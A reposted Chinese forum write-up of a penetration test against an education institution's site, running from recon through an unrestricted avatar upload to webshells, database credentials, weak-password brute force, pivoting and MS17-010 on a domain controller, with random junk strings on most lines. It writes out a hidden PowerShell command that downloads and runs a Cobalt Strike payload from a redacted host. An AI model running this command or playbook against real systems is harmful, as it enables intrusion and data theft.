|
( H0 ^) H" l- G3 h; O+ q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路9 k8 J5 b1 H, b2 i0 A7 V
# O0 u; C- y8 t7 y6 p
( `) Y1 L# z. a2 V L! G
# w+ R/ X" l. h9 N. x! Z1 G
3 z& L' p, @7 p" }: V- T
' u' f- G6 t& e2 [1 ^ 正文
4 [7 l6 ?# X! G . f+ x' C t6 |, T# p; U' u- m/ J
( }! w# D+ Y _; j
# ]5 u( [$ ^4 R
. {: e& f+ ~8 h
0 T& L, N; _& {5 S3 T2 K 目标:www.xxxx.com(一家教育机构)
1 F. ^" [: l2 g打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- D; X# a: \: K C5 c0 c& U, E. b
9 b, q7 K2 U+ X4 y; C' u9 q" C
* z: M$ }% {. P) C  9 K0 O# l6 {7 `3 W
- _& k* I/ Q9 t8 |4 L# J9 _3 K! e: t$ z" M; m5 r
进行了简单的信息搜集
7 _; V% U& _0 s1 e" r
2 \1 L1 g5 W& w# O6 h: `- z0 \; `7 u" I( ?% U# ?
7 \: ^$ q& Y$ a7 f
, d, L# b3 P- E) g6 N7 w 子域名搜集
( V7 Q6 E( ]7 k7 _ I: f& [" Z3 a* ^$ a
; P3 x; m, K! s5 N! N# k3 r& C1 [/ [ 
$ E5 I+ s& e# T. l
5 M; A4 [3 s( ?7 d `, x3 ]0 v1 k: X; Z' }- r2 [7 `
fofa找资产
) ?' D3 L" l2 X
% A, E+ P. w# {# v) T& m) l$ _. N
9 ^) a2 n/ f- z1 e: P6 T1 J& {
6 x" o1 F! Y3 r) |8 H" Z( w
, \& G; D" d+ k9 o$ @4 @8 d3 n+ H2 v4 m  0 W# d) ~' A1 K
! Y4 _" V! s2 D' }* ^! ~! i" w5 V0 c: a( D/ ]# l
一共七个资产。去重之后只有两个。
( l& a6 F7 v- N& u4 C" }
$ K% j$ D: d$ Y5 j) d5 L+ S9 C5 S/ S! ^2 D( Y7 g
9 T- }7 _$ J) c/ ^$ X' r
! e: B U+ K; b) z, Y; [ 目录探测
/ h: K0 m' s9 s" O9 a
0 }% ?7 v6 M1 |) e4 L/ [' B6 E
( z/ [" Y( t1 E8 ~ 
- q# B9 y* {9 Q: F! y
7 X, w0 z. n- x) n; d9 X* u: S
# h* a4 A7 b- M, w5 \4 e 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
, |% ]- C. u& Y4 R w( d3 d
7 @# }$ s6 O0 X( S3 J9 T* F8 C! y4 i7 z- p+ I$ Z
) `1 \+ w1 t9 R/ k" `9 s2 I0 n$ O+ y3 V% \) F
我又尝试了通过修改返回包来绕过登录界面4 {( ?/ a5 p) ?" p
2 c) [3 }' \6 q! Q5 P3 J X9 u
) n2 f( |5 D5 @- A 
9 v0 {& W7 k N( ^( O- g0 R
" {3 j. [% ^# [. s t+ f! Z9 P& O- r% y
还是不行,尝试注入无果2 z( ^7 j+ `. u3 s# {" O
( C5 V7 b( T% r! L# @( `
( s- u- j. e' `2 W& Y0 [( m- s
1 {! L8 W4 w7 z! `$ ~3 [ + m* h( x' j6 Z! V
" M+ L, K; [9 H7 i; C q
不过我目录探测出了一处Spring信息泄露
( S7 J0 \4 w" j! t' l
3 x: F- @, V' A1 Q1 f
7 i& y( K X# o# _0 p% }: _" G0 z! \
1 P, C; {8 I" L- O) p4 ^3 l. r8 G" B* D- g
5 Z' l% v3 c* }3 f6 V+ E( }- ~
! i! T2 B6 C* s+ O6 ~- H7 A9 ]7 I% T1 Z, F
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
- M% @& G; E( E2 S ; K! k: a5 I6 z1 b4 X; v- d; j
& z+ n! X( i- v+ g- w
" v/ B `! @* ]3 c' V6 p+ M6 D
( K8 t1 |( Z3 c: O. ?3 h3 n. C
- G( A! [9 p) B" }5 \& ^1 u 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。5 R3 V1 A4 T* K7 O! D
; U9 E5 |) I/ H; j1 U; [5 T3 B7 q# U, P# Z: E- j
 " T0 @7 I; i0 X- C6 A6 J& c: N
& c* i* [2 ^* o7 b! e% j2 c5 |4 k) X/ w( B
获取有些师傅到这一步就手机抓包电脑测了。/ y! V. Q/ `6 E$ D% e* ]- n: A- y) _
( d4 j9 _" E& `( s& g# G
P0 M% Y: k6 T# i( d' Q# f4 z Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。$ p4 P7 K: b5 G2 _
% v" z! b% C# l+ q$ A% w! ?
4 Q7 a, x& G3 o6 l3 Z
其中在一个公众号发现了小程序,可以进行注册。* H4 H! p. C6 u7 U+ s! `- ~5 y
' `& X5 N6 O( ^
! @! N$ g$ Q- O$ y c8 t% U5 m& B
看到了头像上传,尝试上传获取WebShell* W& X, n4 g1 L9 M; A* k- c. N
. v. P R8 M" P I$ ~; {
9 g5 V! O+ a# ]9 G9 \: V* T$ \  ) W& c3 ~1 [! O; f
, u2 l3 e4 m* X* y3 C/ M9 L; Q% S) p( G/ Z6 {' c# {* G7 Y& V
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问! E: M+ ~9 g/ P/ C8 v8 m2 q
( }/ S# I0 ]1 i# H$ c F6 m) t
1 S7 s+ n- S7 X( L2 q* D7 g) c 
; ]- W* w- @2 P
. D) i s1 P: K4 ]; C/ }& E! {7 i' Y& A1 w! r( D$ f A0 Q
然后上了大马
6 G r G* O2 _ 4 h8 ~2 J* c8 r, u: O
& \1 s' |3 F% ?$ j4 r/ f7 @
 ( l: ` |* e( R3 n
: F8 e$ F# u. n7 W$ F2 [+ ^% G8 F
" w2 E. ^5 b. z- Q6 n  0 S' c7 u7 R) h* P b( m( Z
3 D0 `) Z9 p1 u9 l0 R' J9 _3 ]( ^- T
通过翻找文件发现数据库账号密码7 s; T( R% A# {# r- N: Y
1 A* [/ \5 v, N0 L& W
3 N; Q, p! t- }- ~/ V  * Y" u4 e X- b$ {* ?; G
( X f* K& @. K/ g2 Q$ Q2 ~- G3 j2 ]6 e# r) W% b/ V, W
--内网渗透
: f9 Y! Y+ W% b+ g8 {* k" X4 [2 V
4 Q% F! _- E/ N& h9 {
v* d: n" K$ E2 \ 直接通过powershell执行 cs上线! C. A2 {& [1 U3 b8 C
8 |2 S. _* o9 N$ O, Q2 E
o; c7 Y2 r; p- N, O; `& i2 F
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"5 j. R& J1 X; T ?5 L
) m/ g$ u& S6 }$ }1 v, W' n
, L6 Q1 z% `) F( y0 I/ T1 S4 K  5 D* R* j! M8 L4 v2 T& R
' R2 W0 Q- N7 ]
( P- g5 z# M/ |% {0 G& k- i
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破6 x i! N- ?6 j0 i$ ?
2 F3 j+ i" U- t2 [
- c$ X B* m* b* \4 L( z. ] 
' x% r: I" T% m8 v
' }0 a5 z5 c) f* M7 f3 [/ r: U+ J$ c( s6 ~' |& C2 n; U6 \
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
8 J: E$ `# s$ c4 `! ?
/ w" ~2 F" f5 _# e* B) [9 \: W3 ?
2 t' [4 A& }9 m' i# c
; I+ l" s* w' y- a* T, h6 S. q 2 m( N0 Z& C! b( K4 a* E; W0 P5 s
5 s( X$ Y" R9 i/ @ y- {+ ` 
# s, W5 m! G. F0 K- ` 4 c" a; s7 A3 i0 ?: T# H% Y i- s
) Y% z5 D- s% P4 o; |$ T, t' _
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
0 R4 T8 b) }' K6 M$ G
, R4 p4 A5 ?' J- U8 |9 }) ?) z
8 ^' M$ `' z" c$ c* k- f 5 ]* O6 d$ d; q! I
: R* ?; Y8 h4 b  + p$ a8 d! c2 Q @7 K3 F/ ~
$ q1 v6 ~1 N0 u8 g" S( h! |. q
- a5 j; L; V. F; y/ m
( b0 E6 i$ D# G8 @+ K; {& s
5 p7 D! e) n6 t0 L4 D) q' R
" m* f/ ^0 n8 H/ U. n: f8 u" Z6 o& S+ E/ m 8 y6 n# Z' v4 A; g
3 M; D) c5 N* g) {
% v+ \& w, `2 \7 k- q+ j. i* H, ` ' v0 j; y6 Y& Z+ i% B b
- z. i+ E1 Z) E! m 小结
, e! B5 t K! i 5 m# y* n2 A, ^. ]8 m4 o% z
/ f# P9 v; {+ _
* G8 K$ g. y$ z ( E! }+ L9 Q6 Y/ i7 C
1 w- K% n) V& r( ], H% w8 a x
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!! L: I3 a/ j9 W
9 X# M; _: P, L5 l
& ~/ |0 w W- G7 N$ A% N 4 L& x$ m& L% V1 V; |1 x( ~. @
8 D6 P- L6 V' p z0 t2 I$ c+ x
: h& |1 \) N- d' Y -
4 b3 {) v9 q" R+ v/ b* o& A 5 c6 B1 A2 M; |; f8 f
1 c! U7 F$ X( V$ K+ q, S
- / r! x' J& u# t Y
* m" z% J) \$ E* U+ `
" |% j: N; q" `3 Q J0 y0 s- i
) [0 Q& j6 q' Q7 v- N) p
6 D' i6 e8 R/ l2 r8 x5 v
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
8 u: Q' s+ {( h
/ ?4 U0 n. ]0 h. @7 X' @0 w( p1 _7 Z/ D& K% o8 u7 w9 ]0 o
5 a" [: \# B& I9 p7 `! s3 D
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对